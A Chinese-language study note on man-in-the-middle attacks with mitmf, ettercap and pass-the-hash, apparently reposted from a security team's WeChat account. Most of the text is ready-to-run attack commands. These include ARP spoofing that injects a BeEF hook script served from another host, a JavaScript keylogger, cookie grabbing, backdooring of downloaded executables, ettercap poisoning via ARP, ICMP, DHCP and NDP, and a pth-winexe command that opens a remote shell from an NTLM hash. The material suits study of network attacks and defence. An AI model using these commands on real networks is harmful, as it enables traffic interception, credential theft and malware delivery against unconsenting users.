密码破解——中间人攻击(mitmf、ettercap、PTH)
前言
本节学习中间人攻击
1、mitmf
kali没有预安装
可参考
https://blog.csdn.net/Fly_hps/article/details/80564411
结合beef
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://192.168.1.110:3000/hook.js #作为中间人连接网页并插入 js
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger #键盘记录器 --jskeylogger
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --upsidedownterne #图片上下颠倒
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen #每10s快照,在var/log/mitmf
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --ferretng #抓取cookie
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler #浏览器与插件信息
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --filepwn #用户下载的可执行程序在经过代理的时候,会被插入后门,有个成功率
2、ettercap
统一的中间人攻击工具
转发 MAC 与本机相同,但 IP 与本机不同的数据包
支持 SSH1、SSL 中间人攻击
Snifer
配置文件在 /etc/ettercap/etter.conf
负责数据包转发
unified:单网卡下独立完成三层包转发
bridge:双网卡情况下的一层MITM模式,可作为IPS过滤数据包
MITM
把流量重定向到 ettercap 主机上
可以使用其他工具实现 MITM,ettercap 只作嗅探和过滤使用
实现方法
-
ARP
-
ICMP :路由重定向,半双工
-
DHCP:修改网关地址,半双工
-
Switch Port Stealing :flood目标地址是本机,源地址是受害者的包,适用于ARP静态绑定的环境
-
NDP :IPv6协议欺骗技术
操作界面
-T:文本界面图形
-G:界面
-C:基于文本的图形界面
-D:后台模式
例子
ettercap -i eth0 -T -M arp:remote -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
#arp攻击,-F是过滤器(脚本),-P是模块,-w抓包,-l日志,-L详细日志,-m消息,remote全双工
ettercap -i eth0 -T -M icmp:00:11:22:33:44:55/192.168.1.110 #ICMP(真实网关的MAC/IP)
ettercap -i eth0 -T -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1#DHCP (DNS)
ettercap -i eth0 -T -M port /1.1.1.1/ /1.1.1.2/ #Port
ettercap -i eth0 -T -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/ #Ndp
日志查看
etterlog -p log.eci
etterlog -c log.ecp
etterlog -c -f /1.1.1.1/ log.ecp
etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件
脚本
在/usr/share/ettercap/
etterfilter etter.filter.ssh -o ssh.ef #编译
3、Pass the Hash (PTH)
密码破解耗费时间资源巨大
使用密文提交给服务器直接完成身份认证
NTLM/LM是没有加盐的静态HASH密文
企业中使用ghost等工具克隆安装系统
pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd
结语
至此密码破解学习结束
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):密码破解——中间人攻击(mitmf、ettercap、PTH)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论